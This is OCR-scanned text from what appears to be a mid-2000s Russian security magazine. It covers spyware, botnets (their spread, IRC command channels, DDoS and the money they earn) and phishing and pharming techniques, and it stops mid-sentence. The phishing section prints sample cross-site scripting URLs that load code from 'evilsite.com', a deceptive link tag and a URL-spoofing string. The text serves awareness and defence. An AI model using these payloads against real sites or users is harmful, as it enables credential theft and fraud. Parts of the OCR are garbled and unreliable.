наружили на своем компьютере свыше сотни 
различных spyWware. И это притом, что были 
установлены антивирус и персональная система 
предотвращения атак (RealSecure Desktop). Поэ- 
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тому часто spyware конкурируют между собой 
«за место под солнцем» и мешают друг другу 
(есть примеры, когда одни шпионы отключали 
других). Это способствует тому, что пользова- 
тель, обнаружив какую-то нестабильность в ра- 
боте своего компьютера (высокая загрузка про- 
цессора, посторонние файлы, «левый» трафик), 
задумывается о своем вероятном инфицирова- 
нии и начинает целенаправленно искать и унич- 
тожать установленных шпионов. 

Но далеко не все из них можно удалить без 
нарушения работоспособности компьютера. Если 
spyware внедрен в код программы (а не просто ин- 
тегрирован через инсталлятор), то зачастую уда- 
лить его невозможно — приходится полностью пе- 
реустанавливать софт (а иногда и приобретать 
«чистый» от шпионов вариант). Тот же Targetsoft 
так меняет Winsock (inetadpt.dll), что его удаление 
приводит к невозможности использовать сетевые 
возможности. В худшем случае пользователь вы- 
нужден менять даже ОС, чтобы быть уверенным, 
что компьютер лишен всякой заразы. Другой не- 
приятной особенностью отдельных Spyware явля- 
ется их способность нарушать работоспособность 


›рите ПК, который ‘принесет 
шему бизнесу 
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персональных межсетевых экранов и антивирусов. 
Зачастую шпионское ПО интегрируются с червя- 
ми, и переносится от компьютера к компьютеру с 
их помощью. Например, W32.Spybot инсталлирует 
«жертве» порнографический spyware. 

>» = заключение. Тема шпионского ПО (spyware) 
обширна, и ей посвящены целые сайты и книги. 
Некоторые университеты (например, Универси- 
тет Калгари) даже ввели в свою программу обуче- 
ния курсы по программированию spyware и мето- 
дам распространения спама. И это не случайно. 
Эксперты по безопасности должны знать, как бо- 
роться с этой угрозой, которая не только не стиха- 
ет, но и будет нарастать день ото дня. Ведь по ста- 
тистике свыше 70% «писателей» пишут свои тво- 
рения по контракту, преследуя вполне коммерче- 
ские цели. А значит, ни о каком альтруизме и ис- 
следовательских целях и речи быть не может. По- 
ка создатели spyware пишут свои творения «за 
металл», ситуация кардинальным образом не из- 
менится © 


http://msdn.microsoft.com/library/default.asp?url= 
ibrary/en-us/dnwebgen/html/bho.asp 
подробное описание работы технологии BHO 
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Распространено мнение, что, по крайней мере, 
каждый второй домашний компьютер, подключен- 
ный к интернету, состоит сегодня в какой-либо бот- 
сети. Это не означает, что бот-сеть обязательно 
действующая: многие сети могут находиться 
В «ждущем режиме». Но факт остается фактом — 
машина заражена и подобно «спящему вулкану» 
таит в себе потенциальную угрозу как для своего 
владельца, так и для других машин в сети. Однако 
не только домашние пользователи приняли на се- 
бя удар: порядка 40% бот-сетей принадлежит кор- 
поративным сетям больших и средних компаний. 
В списке пострадавших уже находятся такие кру- 
пные компании Kak Caterpillar, CNN, eBay и Micro- 
soft. И угроза распространения зомби-сетей no- 
стоянно растет. Количество новых штаммов (раз- 
новидностей) бот-вирусов только за 2005 год уве- 
личилось на 538%. 

Неудивительно, что именно бот-сети являют- 
ся основными центрами притяжения крупных фи- 
нансовых потоков теневого виртуального рынка. 
Особый интерес для умельцев представляют ма- 
шины, имеющие высокоскоростное подключение 
к Сети, потому как с их помощью гораздо проще 
и эффективнее организовать атаку на другие се- 
тевые ресурсы. Противодействовать такому мас- 
совому распространению бот-сетей крайне слож- 
но. Крупную сеть из «компьютеров-зомби» можно 
создать за неделю-две. А на ее обнаружение 
и нейтрализацию могут потребоваться месяцы ра- 


БОТНЕТ 


агентурная сеть 


КОМПЬЮТЕРЫ ДОМАШНИХ ПОЛЬЗОВАТЕЛЕЙ — ЛАКОМЫЙ КУСОК ДЛЯ ЗЛОУМЫШЛЕННИКОВ, 
ПОСКОЛЬКУ ПОДАВЛЯЮЩЕЕ БОЛЬШИНСТВО ТАКИХ СИСТЕМ РАБОТАЕТ ПОД УПРАВЛЕНИЕМ 
MICROSOFT WINDOWS И ЧАСТО НЕ ОБНОВЛЯЕТСЯ ВОВРЕМЯ (ЕСЛИ ОБНОВЛЯЕТСЯ ВООБЩЕ) 


боты. Выйти же на владельца бот-сети — еще бо- 
лее трудновыполнимая задача. 

Угроза со стороны бот-сетей постоянно ра- 
стет. Каждый день инфицируется до 250000 ком- 
пьютеров, которые превращаются в новых зомби. 
По статистике, в Сети постоянно зараженными ка- 
ким-либо видом вируса являются около 7% ком- 
пьютеров, это около 47 миллионов из 681 миллио- 
на подключенных к Сети компьютеров по всему 
миру. По данным антивирусной компании McAfee, 
в 2005 году в интернете была зафиксирована дея- 
тельность 28 тысяч бот-сетей — это в три раза 
больше, чем в 2004 году. Потери только амери- 
канских компаний от преступлений в компьютер- 
ной сфере составили 197 миллиардов долларов, и 
львиная доля здесь принадлежит бот-сетям... 
> механизмы распространения ботов. Злоумы- 
шленник может применять и комбинировать лю- 
бые из перечисленных ниже техник распростра- 
нения ботов. 

1 Через веб и электронную почту. Различ- 
ные веб-сайты, намеренно или без злого умы- 
сла, содержат в себе вредоносный код, который 
загружается на машину пользователя в момент 
загрузки сайта. Что касается распространения 
исполняемых бот-файлов по электронной почте — 


то это наиболее удобный и быстрый способ распро- 
странения. Широкая распространеннность спам- 
рассылок обеспечивает этому способу «массо- 
вый охват». 

2 Загрузка программного обеспечения из не- 
проверенных источников. Очень часто заражение 
происходит при загрузке программного обеспече- 
ния из подозрительных и неизвестных источников. 
Особенно это касается различных бесплатных ути- 
лит, которые нередко пишутся самими же злоумы- 
шленниками и затем используются ими в качестве 
приманки. Так, например, клиентская часть неко- 
торых Р2Р-сетей загружается вместе со шпион- 
ским и рекламным программным обеспечением. 

3 Использование уязвимостей в системах. 
В первых двух вариантах предполагается непо- 
средственное участие пользователя. То есть, тео- 
ретически, продвинутый пользователь, обладаю- 
щий здоровой долей паранойи, может счастливо 
избежать заражения при помощи таких техник. 
Тогда на помощь злоумышленникам приходят 
другие методы, которые не требуют от владельца 
машины никаких действий. В практически любой 
компьютерной системе есть хотя бы одна уязви- 
мость, которая может быть использована для за- 
грузки на машину троянской программы, бота или 


другого вредоносного ПО. Злоумышленник может 
производить сканирование выбранного диапазо- 
на 1Р-адресов как вручную, так и при помощи ав- 
томатизированных средств. Автоматическое ска- 
нирование Сети с целью поиска машин с какой- 
либо конкретной уязвимостью помогло таким 
всем известным вирусам, как CodeRed, Мудоот и 
Sql Slammer распространиться и заразить миллио- 
ны компьютеров. Для распространения исполняе- 
мых бот-файлов используются те же самые мето- 
ды. Если ты посмотришь на топ-20 самых распро- 
страненных угроз, то увидишь, что порядка 30% 
этих угроз составляют вредоносные программы 
для создания бот-сетей (MYTOB, BKDR_IRCBOT, 
PERL_SHELLBOT и другие). 
> | командование армией. Обычно для органи- 
зации бот-сети используются IRC-KaHan или P2P- 
сеть. Наиболее популярным и простым средством 
для организации бот-сети является IRC (Internet 
Relay Chat). Это довольно популярная чат-система, 
работающая по принципу клиент-серверной моде- 
ли. IRC-cepBep позволяет подключенным клиентам 
общаться, используя 1ВС-протокол, как через сер- 
вер, так и устанавливая соединение напрямую. 
Схема работы большинства бот-сетей в об- 
щем виде выглядит примерно следующим обра- 
зом. Бот подключается к определенному IRC-KaHa- 
Лу на 1ВС-сервере и ожидает дальнейших команд. 
Обычно подключение зараженного компьютера к 
1РС-каналу осуществляется через порт 6667 (это 
порт, который по умолчанию используется для 
подключения к IRC), но может использоваться и 
другой порт, если атакующий задается целью за- 
труднить обнаружение следов своей деятельности. 
Ценным преимуществом IRC является то, что та- 
кие серверы находятся в свободном доступе, и их 
просто настроить, к тому же они широко распро- 
странены по всей Сети. 
> управление бот-сетью. Исполняемая часть 
бота настраивается для входа в предопределен- 
ные каналы IRC. 


29 


КАЖДЫЙ ДЕНЬ ИНФИЦИРУЕТСЯ ДО 250000 КОМПЬЮТЕРОВ, 
КОТОРЫЕ ПРЕВРАЩАЮТСЯ В НОВЫХ ЗОМБИ 


На сервере создается определенный канал (к при- 
меру, #TESTING). После того как на машине жер- 
твы запущен соответствующий бинарный файл, 
эта машина подключается к указанному каналу на 
сервере и ожидает поступления дальнейших ко- 
манд от владельца бот-сети. 

Несмотря на то, что данный бот не выдает в 
явном виде свое присутствие на машине пользова- 
теля, его можно обнаружить по списку запущенных 
программ и по статистике сетевых соединений. 
> = использование бот-сетей. Размеры ботнетов 
могут быть разными. В среднем размер зомби-сети 
варьируется от нескольких сотен до нескольких ты- 
сяч машин. Но известны также бот-сети размером 
30, 50 тысяч машин и более. Есть данные о бот-сети 
(Phatbot), объединяющей 400 тысяч (!) машин. 

Какой трафик может генерировать бот-сеть? 
Если взять бот-сеть из 1000 машин с полосой про- 
пускания порядка 128 Кбит/сек, то нетрудно посчи- 
тать, что все вместе эти компьютеры в состоянии 
генерировать трафик более 100 Мбит/сек. Более 
крупной бот-сети достаточно меньшей пропускной 
способности каждого канала в отдельности. Сеть 
из 50000 машин со скоростью подключения 50 
Кб/сек может генерировать трафик до 300 Мб/сек. 

Механизмы, которые бот-сети используют 
для распространения — одна из главных причин 
фонового «шума» в интернете, особенно на 445 и 
135 {ср-портах. Таким образом производится по- 
иск новых уязвимых машин, чтобы присоединить 
их к бот-сети. 

Бот-сеть — это инструмент, использующийся 
наиболее часто в качестве инструмента для полу- 
чения денег (прямо или косвенно). Наиболее рас- 


пространенные способы использования действую- 
щих бот-сетей выглядят следующим образом. 

1 DDoS-ataka. Организация этого вида атаки — 
пожалуй, самый распространенный вид использо- 
вания бот-сетей. Атака может реализовываться 
при помощи отправки больших ICMP или SYN-na- 
кетов в Сеть, либо просто большого количества 
обычных http и Нр-запросов к серверу. Причины, 
по которым обычно затеваются DDoS-ataku, могут 
быть различными: шантаж, вымогательство, не- 
честная конкурентная борьба и т.д. DDoS-ataku не 
обязательно бывают направлены только на веб- 
серверы: любой интернет-сервис может быть уяз- 
вим к этому типу нападения. 

2 Создание цепи SMTP relay. Некоторые боты 
открывают SOCKS proxy на зараженном хосте, что 
позволяет осуществить доступ через прокси-сер- 
вер (с целью маскировки следов). Такая машина 
может использоваться для рассылки спама. Иног- 
да зараженные машины, составляющие бот-сеть, 
используются для хостинга фишинговых сайтов, 
усложняя процедуру выслеживания мошенников. 

3 Прослушивание трафика. В бот-сетях так- 
же могут использоваться снифферы, позволяю- 
щие отслеживать данные, передаваемые по неза- 
щищенному каналу (clear-text data) и проходящие 
через зараженную машину. Как правило, целью 
применения снифферов является получение имен 
пользователей и паролей. Кроме того, с их помо- 
щью можно получить интересную информацию 
другого рода. Часто бывает так, что зараженная 
машина является частью не одного, а двух или да- 
же более ботнетов. В этом случае сниффер позво- 
ляет собирать информацию о «конкуренте» © 


ПРИБЫЛЬ ОТ ИСПОЛЬЗОВА- 


НИЯ БОТ-СЕТЕЙ 


000$ в аренду 

Цифры могут довольно сильно варьиро- 
ваться, но чаще встречается примерно 
100$ за час DDoS-ataku, организованной 
при помощи зомби-сети из 10000 машин 
(www.spamdailynews.com/publish/Organiz- 
ed_crime_offers_rent-a-zombie_deals.asp). 


кража номеров счетов, включая номера 

кредитных карт и других финансовых данных 
Если верить данным ЕТС (Федеральная 
торговая комиссия США), то средняя стои- 
мость кражи идентификационных данных 
составляет порядка 4800$ для компании и 


500$ для отдельно взятого индивидуума 
(www.ftc.gov/opa/2003/09/idtheft.htm). Вряд 
ли имеет смысл высчитывать среднюю 
прибыль, которую может получать мошен- 
ник от использования украденной инфор- 
мации. Это зависит и от квалификации мо- 
шенника, и от того, насколько далеко он 
готов зайти в погоне за прибылью. Как пра- 
вило, номера кредитных карт используют- 
ся злоумышленниками не для обналичива- 
ния средств, а для оплаты услуг через ин- 
тернет (например, хостинга). Часто это де- 
лается через подставное лицо. 


спам-рассылка 
Средняя стоимость спам-рассылки в Рос- 
сии составляет от 100 до 200$ (это охват 


базы примерно в 150000 электронных ад- 
ресов). Особо ценятся «незасветившие- 
ся» |Р-адреса, которые пока не помещены 
в «черный список», поскольку отдача от 
рассылок с таких «чистых» адресов го- 
раздо выше. 


программы дозвона 

Многие по-прежнему используют dial-up 
соединение для доступа в интернет. Такой 
вид связи — низкоскоростной и вряд и мо- 
жет быть полезен для организации 0005- 
атаки, но и из него, при желании, можно из- 
влечь определенную прибыль. В данном 
случае номер дозвона может подменяться 
на телефон какой-либо платной службы, а 
прибыль здесь зависит от оперативности 


обнаружения «неполадок» с дозвоном и та- 
рифа на звонки в эту службу. 


генерация пользовательского трафика 
Стоимость услуг по генерации пользова- 
тельского трафика составляет примерно 
$150 за 1000 загрузок. В этом случае бот- 
сеть получает команду выполнить 1000 раз 
загрузку некого html-cbaina после предва- 
рительного тематического запроса в ин- 
тернет (в каталоги или поисковую систе- 
му). Это дает пользовательский трафик, 
который можно использовать для повыше- 
ния индекса цитируемости сайта в поиско- 
вых системах или получения средств за 
просмотр рекламных баннеров в случае 
платы за показ. 
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Кевин Митник в своей книге «Искусство обмана» 
пишет о том, что каждый человек, независимо от 
его социального положения и уровня образова- 
ния, сознательно или подсознательно хочет быть 
полезным, и это одна из сторон человеческого 
сознания, на которой играют мошенники. Другая 
«слабость» — это часто встречающееся безого- 
ворочное доверие пользователей какому-либо 
бренду, марке и т.п. Получая сообщение, напри- 
мер, от банка, услугами которого пользуется ад- 
ресат, с предложением ввести в форму данные 
своего банковского счета, человек, не задумыва- 
ясь, отдает критичную финансовую информацию 
прямиком в руки мошенников. 

Фишинг — самая распространенная форма 
социального инжиниринга, которая наиболее ча- 
сто использует в качестве канала проникновения 
к пользователю электронную почту. Если твой элек- 
тронный адрес «засветился», и ты попал в базу 
спам-рассылки, ты получаешь п-ное количество 
спам-сообщений в сутки, и, как минимум, 2 из них 
являются типичными представителями индустрии 


на живца 


ФИШИНГ 


ЧЕЛОВЕЧЕСКИЙ РЕСУРС ВСЕГДА БЫЛ И ОСТАЕТСЯ САМЫМ ВАЖНЫМ, НО И, ВМЕСТЕ С ТЕМ, 
САМЫМ КРИТИЧНЫМ ЗВЕНОМ В ЛЮБОЙ, ДАЖЕ САМОЙ ТЕХНОЛОГИЧЕСКИ СОВЕРШЕННОЙ 
ЦЕПИ. НА РАЗРАБОТКЕ ТАКИХ ВОТ «ПРОСТЫХ ЧЕЛОВЕЧЕСКИХ СЛАБОСТЕЙ» И ОСНОВАН 
МЕТОД СОЦИАЛЬНОЙ ИНЖЕНЕРИИ, КОТОРЫЙ СОСТАВЛЯЕТ 95% УСПЕХА ПРОВЕДЕНИЯ 


ФИШИНГ-АТАКИ 


МОМАМЕ 


фишинга. Кроме распространения через элек- 
тронную почту, фишеры все чаще прибегают к по- 
мощи таких каналов распространения как IRC, ин- 
тернет-пейджеры и веб-страницы. 

Более совершенная модель фишинга полу- 
чила название фарминг. Это относительно новый 
и прогрессивный метод хищения идентификацион- 
ных данных пользователей. Его суть в том, что 
пользователи автоматически перенаправляются 
на фальшивые сайты. В отличие от традиционного 
фишинга, новый метод хищения данных почти не 
требует участия жертвы. Пользователи могут стать 
жертвой фарминга в силу уязвимостей браузеров, 
которые позволяют размещать в адресной строке 
фальшивые адреса сайтов, уязвимостей операци- 
онных систем и уязвимостей ОМ$-серверов. 
> = электронная почта. Как выглядит обычное 
фишинг-сообщение, которое получает пользова- 


тель по электронной почте? Вот несколько стан- 
дартных фраз, встречающихся почти во всех со- 
общениях такого типа: 


—` ПОДТВЕРДИТЕ ДАННЫЕ О ВАШЕМ СЧЕТЕ. 


“ ЕСЛИ ВЫ НЕ ОТВЕТИТЕ НА ДАННОЕ 
СООБЩЕНИЕ, В ТЕЧЕНИЕ 48 ЧАСОВ ВАШ 
СЧЕТ БУДЕТ АННУЛИРОВАН. 


—` КЛИКНИТЕ ССЫЛКУ, ЧТОБЫ ПОЛУЧИТЬ 
ДОСТУП К ВАШЕМУ АККАУНТУ. 


Ни один банк или платежная система не пользует- 
ся подобным способом связи с тобой, чтобы обно- 
вить твои данные, а тем более не требует таким об- 
разом вводить пароли, имена пользователей и ка- 
кую-либо другую личную информацию. Часто об- 
щий тон фишинг-сообщения или его заголовок под- 


талкивают пользователя предпринимать действия 
незамедлительно и не раздумывая, грозя немед- 
ленной приостановкой обслуживания ит.п. 

> — через веб. Все большую популярность прио- 
бретают методы, не требующие «заманивания» 
пользователя на веб-страницу в обязательном 
порядке, а «работающие» с пользователями, пе- 
реходящими от страницы к странице в Сети. Это 
может быть: 


“~ МАСКИРОВКА ССЫЛОК. ССЫЛКИ, 
СПРЯТАННЫЕ ПОД КАРТИНКОЙ, 
ПОДМЕНА СИМВОЛОВ В ССЫЛКАХ 
НА СХОЖИЕ (СИМВОЛЫ ИЗ ДРУГОГО 
РЕГИСТРА ИЛИ ДРУГОГО ЯЗЫКА). 


—` ИСПОЛЬЗОВАНИЕ ПОДДЕЛЬНЫХ 
БАННЕРОВ И ВСПЛЫВАЮЩИХ ОКОН. 


— ИСПОЛЬЗОВАНИЕ УЯЗВИМОСТЕЙ 
БРАУЗЕРА. 


— ЗАПИСЬ ИДЕНТИФИКАЦИОННОЙ 
ИНФОРМАЦИИ ПОЛЬЗОВАТЕЛЯ 
В ПРОЦЕССЕ ВВОДА ДАННЫХ 
НА ЛЕГИТИМНОМ САЙТЕ. 


> — пример: DNSChanger.eg. Данная атака пред- 
полагает разрушение процесса преобразования 
имени домена в фактический веб-сайт. Когда 
пользователь вводит адрес, например, «jpmor- 
дап.сот», состоящий из текстовой строки, его 
нужно преобразовать в !Р-адрес, например, 
«192.220.34.11». Эта троянская программа разра- 
ботана таким образом, чтобы изменять значение 
ключа системного реестра «ИмяСервера» на 
поддельный IP-agpec. Если жертва вписывает вер- 
ный URL, ее направляют на фальшивый мер-сайт. 
То есть в этом случае вообще не требуется никого 
никуда заманивать. 

> IRC и интернет-пейджеры. Распространен- 
ность IRC и интернет-пейджеров (IM) не могла не 
способствовать обращению злоумышленников к 
этому каналу распространения вредоносного ПО. 
Поскольку большинство IRC и 1М-клиентов разре- 
шают загрузку различного рода содержимого 
(графиков, URL-ccbinok и т.д.), нетрудно адаптиро- 
вать многие методы фишинга под этот канал рас- 
пространения, а повсеместное распространение 
бот-сетей делает эту задачу еще легче. 

> зараженные машины. Нужно отметить, что 
постоянно увеличивается количество домашних 
компьютеров, которые используются злоумы- 
шленниками в качестве источника атаки. Установ- 
ка троянской программы на такой компьютер пре- 
вращает его в «промежуточное звено» между 
злоумышленником и жертвой. 

>» = методы фишинговых атак. Поскольку фише- 
ры материально заинтересованы в успешности 
своих атак, ими разработано великое множество 
способов, которые заставляют пользователя об- 
ращаться к серверу злоумышленника или его веб- 
странице. Вот наиболее распространенные: 


™ АТАКА «ЧЕЛОВЕК ПОСЕРЕДИНЕ». 

™ ПУТАНИЦА С URL. 

“~~ CROSS-SITE SCRIPTING. 

™ АТАКА С ИСПОЛЬЗОВАНИЕМ 
ПРЕДОПРЕДЕЛЕННОГО 
ИДЕНТИФИКАТОРА СЕССИИ. 

— ЭКСПЛУАТАЦИЯ УЯЗВИМОСТЕЙ. 


1 Атака «человек посередине». Одним из на- 
иболее популярных и излюбленных способов ата- 
ки является схема «человек посередине», когда 
злоумышленник находится между пользователем 
и веб-приложением, к которому пользователь по- 
лучает доступ. В этом случае атакующий выступа- 
ет в роли прокси-сервера, через который пользо- 
ватель взаимодействует с приложением. Эта фор- 
ма атаки успешно применяется как для http, так и 
для ИНрз-соединений. Для пользователя подклю- 
чение к прокси-серверу злоумышленника выгля- 
дит точно так же, как обычное легитимное под- 
ключение. В случае использования защищенного 
соединения HTTPS (с использованием SSL) дан- 
ные пользователя могут быть записаны в незаши- 
фрованном виде, так как пользователь сначала 
соединяется с прокси атакующего, а тот, в свою 
очередь, устанавливает 5$ -соединение с реаль- 
ным сервером уже от своего имени. 

Для того чтобы успешно выступать в роли 
проксирующего сервера, атакующий может при- 
менять несколько методов: 


— ПРОЗРАЧНЫЙ ПРОКСИ. НЕ ЗАМЕТЕН 
ДЛЯ ПОЛЬЗОВАТЕЛЯ, НО ПРИ ЭТОМ 
ПЕРЕХВАТЫВАЕТ И ОБРАБАТЫВАЕТ 
ВЕСЬ ТРАНЗИТНЫЙ ТРАФИК. 


™ ОТРАВЛЕНИЕ ОМ$-КЭША. ЗЛОНАМЕРЕН- 
НЫЙ ПОЛЬЗОВАТЕЛЬ ВНОСИТ 
ИЗМЕНЕНИЯ В КЭШ DNS ТАКИМ 
ОБРАЗОМ, ЧТО ПРИ ЗАПРОСЕ 
ЛЕГАЛЬНОГО ИМЕНИ ПОЛЬЗОВАТЕЛЮ 
ВОЗВРАЩАЕТСЯ 1Р-АДРЕС 
ПОДСТАВНОГО СЕРВЕРА. 


— ПУТАНИЦА С URL. РЕГИСТРАЦИЯ URL, 
ОЧЕНЬ ПОХОЖИХ НА АТАКУЕМЫЙ 
ИЛИ ФИШИНГОВЫЙ. НАПРИМЕР, 
WHITEHOUSE.GOV И .СОМ ОЧЕНЬ 
СИЛЬНО ОТЛИЧАЮТСЯ ПО СОДЕРЖА- 
НИЮ. ПЛЮС УЧИТЫВАЮТСЯ САМЫЕ 
РАЗНЫЕ ОПЕЧАТКИ ПОЛЬЗОВАТЕЛЕЙ 
(ТИПА MICRO, MICO, MICOR...). 


—` КОНФИГУРАЦИЯ ПРОКСИ. ВСТРЕЧАЕТСЯ 
РЕЖЕ ДРУГИХ. БРАУЗЕРЫ МОЖНО 
АВТОМАТИЧЕСКИ КОНФИГУРИРОВАТЬ 
С ПОМОЩЬЮ РАС-СКРИПТОВ 
И ПРОТОКОЛА WPAD (WEB PROXY 
AUTODISCOVERY PROTOCOL). TO ECTb 
С ПОМОЩЬЮ ЭТИХ СРЕДСТВ МОЖНО 
НАПРАВИТЬ ПОЛЬЗОВАТЕЛЯ ЧЕРЕЗ 
ПОДСТАВНОЙ ПРОКСИ-СЕРВЕР. 
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2 Путаница с URL. Одна из наиболее про- 
стых и банальных техник, которая, тем не менее, 
прекрасно работает с доверчивыми пользователя- 
ми — искажение имени домена. В рамках этого ме- 
тода злоумышленник искажает реальное доменное 
имя и присваивает его своему серверу. Сходство 
подставного веб-адреса с реальным в большинстве 
случаев не вызывает у пользователя подозрений: 


™ HTTP://PRIVATEBANKING.MYBANK.COM.CH 

“ HTTP://MYBANK.PRIVATEBANKING.COM 

™ HTTP://PRIVATEBANKING.MYBONK.COM 

™ HTTP://PRIVATEBANKING. 
MYBANK.HACKPROOF.COM 


3 Cross-site scripting. Атаки cross-site scripting 
(CSS) используют технику инъекции кода в легит- 
имные веб-приложения. Как правило, возмож- 
ность применять такие техники связана с огреха- 
ми разработчиков этих приложений. Типичный 
пример атаки С$$ выглядит примерно следую- 
щим образом: 


™ ПОЛНАЯ ЗАМЕНА HTML (В КАЧЕСТВЕ ПА- 
РАМЕТРА НАХОДИТСЯ ССЫЛКА НА САЙТ 
ЗЛОУМЫШЛЕННИКА): НТТР://МУ- 
BANK.COM/EBANKING?URL=HTTP://EVILSI- 
TE.COM/PHISHING/FAKEPAGE.HTM. 


“~ ВСТАВКА СКРИПТА В URL: HTTP://MY- 
BANK.COM/EBANKING?PAGE=18CLI- 
ENT=<SCRIPT>EVILCODE... 


™ ПРИНУДИТЕЛЬНАЯ ЗАГРУЗКА ВНЕШНЕ- 
ГО КОДА: НТТР://МУВАМК.СОМ/ЕВАМ- 
KING?PAGE=1&RESPONSE=EVILSI- 
TE.COM%21EVILCODE.JS&GO=2. 


Суть данной атаки заключается в TOM, что пользова- 
тель вместе с легитимной страницей сайта получает 
также и содержимое страницы злоумышленника. 
В данном случае это происходит из-за недоработок 
при написании кода для веб-приложения банка. 

4 Атака с использованием предопределенно- 
го идентификатора сессии. В рамках установлен- 
ной сессии на http-cepBepe можно отслеживать пе- 
ремещения пользователя по страницам сайта. 
В веб-приложениях, для которых требуется аутен- 
тификация при помощи идентификатора сессии, 
могут использоваться Cookies, скрытые поля или 
поля, содержащиеся в URL. 

Многие веб-приложения применяют прими- 
тивную систему управления состоянием и позво- 
ляют устанавливать идентификаторы сессии в рам- 
ках клиентского соединения. Данный вид атаки 
подразумевает, что фишинговое сообщение со- 
держит веб-ссылку на реальный сайт, но вместе с 
ней содержит и предустановленное поле иденти- 
фикатора сессии. До тех пор, пока легитимный 
пользователь не аутентифицируется на сервере, 
запросы атакующего сервером не обрабатывают- 
ся, злоумышленник получает сообщения об ошиб- 
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ке (например, 404 File Not Found, 302 Server Redirect 
ит.д.). HO как только фишер дожидается момента, 
когда пользователь зайдет по ссылке и аутентифи- 
цируется со своим идентификатором, он может 
воспользоваться его аутентификационными дан- 
ными с тем же самым (предустановленным) иден- 
тификатором сессии. В этом случае злоумышлен- 
ник может получать доступ к закрытым страницам 
сайта и перехватывать данные пользователя. 

5 Подмена содержимого страницы. Некото- 
рые из существующих методов фишинга позволяют 
помещать поддельное содержимое страницы поверх 
настоящего. Одна из техник реализации этого — ис- 
пользование dhtml-cbyHkynu DIV. С помощью этой 
функции злоумышленник может сделать собствен- 
ную страницу (включая графику) поверх настоящей. 

6 Screen grabbing. Некоторые виды фишинг- 
атак используют технику снятия скриншотов при 
вводе пользовательских данных в веб-приложе- 
ния. Эта функциональность используется с целью 
обхода встроенных в финансовые приложения тех- 
нологий защиты от стандартных key-logging атак. 

7 Использование уязвимостей в почтовых 
протоколах и браузерах. Существующие уязвимо- 
сти в почтовых протоколах также позволяют фи- 
шерам обманывать доверчивых получателей. На- 
пример, модифицируя имя отправителя в строке 
«From» под имя первоисточника. 

Пример написания ссылки, которая вставля- 
ется в веб-страницу или электронное сообщение: 
<a href= http://fakesite.com>https://genuinesite.com</a>. 
Для пользователя ссылка выглядит как https://ge- 
nuinesite.com, однако, кликая по ней, OH оказывает- 
ся на сайте http://fakesite.com. 

Можно также привести еще один пример с 
использованием уязвимостей Internet Explorer. He- 
которые из них позволяют злоумышленнику моди- 
фицировать ссылку в адресной строке браузера. 


лидеры хит-парада 


ЛИДИРУЮЩИЕ ПОЗИЦИИ ПО КОЛИЧЕ- 
СТВУ ПОДДЕЛЫВАЕМЫХ ОТ ИХ ИМЕНИ 
СООБЩЕНИЙ СЕГОДНЯ ЗАНИМАЮТ 
EBAY, PAYPAL И CITIBANK. ПОДДЕЛКА 
СООБЩЕНИЙ ОТ ДРУГИХ БАНКОВ И ПЛА- 
ТЕЖНЫХ СИСТЕМ ИДЕТ СО ЗНАЧИТЕЛЬ- 
НЫМ ОТРЫВОМ. СУЩЕСТВУЕТ ЕЩЕ OT- 
ДЕЛЬНЫЙ ВИД ФИШИНГА, ТАК НАЗЫВА- 
ЕМЫЙ «SPEAR PHISHING», ЗАТОЧЕННЫЙ 
ПОД КОНКРЕТНУЮ ЦЕЛЕВУЮ АУДИТО- 
РИЮ: СОТРУДНИКОВ КАКОЙ-ЛИБО КОМ- 
ПАНИИ, ГОСУДАРСТВЕННОЙ СТРУКТУРЫ 
ИТ.П. ТАКИЕ СООБЩЕНИЯ ЧАСТО MA- 
СКИРУЮТСЯ ПОД СООБЩЕНИЯ ОТ ДОЛ- 
ЖНОСТНЫХ ЛИЦ, ОБСЛУЖИВАЮЩИХ СИ- 
СТЕМУ: СИСТЕМНЫХ АДМИНИСТРАТО- 
РОВ, СЛУЖБЫ БЕЗОПАСНОСТИ И Т.Д. ЦЕ- 
ЛЬЮ ТАКИХ АТАК ЯВЛЯЕТСЯ ПОЛУЧЕНИЕ 
ПОЛЬЗОВАТЕЛЬСКИХ ИМЕН И ПАРОЛЕЙ. 


Так, например, заходя по ссылке http://www.genuine- 
site.com%01%00@fakesite.com/, пользователь видит в 
адресной строке своего браузера следующее: 
http://www.genuinesite.com. На самом деле он нахо- 
дится на сайте злоумышленника. Этот метод эк- 
сплуатирует некорректную интерпретацию неко- 
торых символов, в данном случае %01 и %00. 

8 Маскировка ссылки. В большинстве фи- 
шинг-сообщений содержится ссылка, которая, на 
первый взгляд, выглядит как подлинная. Однако 
текст такой ссылки, как правило, не более чем ма- 
скировка для другой, которая приведет тебя на сайт 
мошенника. Если ты наведешь на ссылку мышку, то 
в сроке состояния почтового клиента отобразится 
нечто, вовсе не похожее на адрес твоего банка. 

С целью маскировки и отвлечения внимания 
в фишинг-сообщения могут добавляться и реаль- 
ные ссылки, но, как правило, та ссылка, по кото- 
рой предлагается зайти и ввести свои данные, яв- 
ляется поддельной. 

э Имитация защищенного соединения. В 
некоторых случаях в строке браузера может ими- 
тироваться защищенное соединение https. Поэто- 
му при открытии защищенного соединения необхо- 
димо обращать внимание на присутствие «замка» 
в статусной строке браузера (Internet Explorer). 

10 Искажение адреса. Довольно распро- 
странен такой прием маскировки адреса, при ко- 
тором меняется одна буква или символ. И при нев- 
нимательном просмотре пользователь может не 
заметить разницы. Например, реальный адрес 
Www.paypal.com может подменяться на WWW.pay- 
pal.com или www.verify-paypal.com. Вариантов таких 
схожих написаний много, и незадачливые пользо- 
ватели часто не замечают подвоха. 

11 Скрытый текст. В некоторые сообщения, 
для обмана фильтров, вставлен текст такого же 
цвета, что и фон. Если выбрать в меню почтового 
клиента опцию «выделить все», то можно увидеть, 
содержит ли сообщение скрытый текст. И являет- 
ся ли текстом то, что якобы «написано». 

12 Комбинированные угрозы. Сейчас все 
чаще фишинговые атаки используются не только 
как средство, толкающее пользователя «добро- 
вольно сдавать» пароли и личные данные, но и 
как инструмент для загрузки на пользовательскую 
машину какого-либо другого вредоносного про- 
граммного обеспечения, чаще всего Spyware или 
троянского ПО. Это позволяет злоумышленнику, в 
случае успешной атаки, получить более полную и 
ценную информацию с зараженной машины, а 
также использовать компьютер жертвы в каче- 
стве плацдарма для новой атаки. 


a go ии. 


(ee ee ee ee cee See ee on ae et ee eed ee ee 
a ee ee es пажа 
oe eee ee ee Se ee ees oe ee ee ee ee ee 
a oe Бадия 


пли EW SSeS BSE as ROE ee eg et 
See a et ae ee epee ee я 


Подставной URL-appec отправляет пользователя на 
мошеннический сайт 


> что делать? Лучший совет, как не попасть в 
ловушку, — удалять подобные письма. Все сообще- 
ния от онлайн-служб, в которых тебя просят ввести 
